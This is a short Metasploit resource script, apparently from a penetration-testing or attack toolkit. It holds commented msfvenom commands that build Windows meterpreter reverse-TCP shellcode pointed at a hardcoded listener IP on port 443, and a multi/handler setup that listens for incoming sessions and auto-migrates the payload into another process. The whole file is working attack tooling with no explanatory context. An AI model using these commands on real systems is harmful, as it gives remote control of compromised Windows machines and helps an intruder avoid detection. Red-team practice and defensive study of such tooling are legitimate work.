##msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.23.28.22 LPORT=443 -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >met.mf
#msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.23.28.22 LPORT=443 -a x64 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >met.mf
use exploit/multi/handler
#set payload windows/meterpreter_reverse_tcp
set payload windows/x64/meterpreter_reverse_tcp
set LPORT 443
set LHOST 0.0.0.0
set ReverseListenerBindAddress 0.0.0.0
set AutoRunScript migrate -f
#set AutoRunScript post/windows/manage/smart_migrate
show options 
run -j
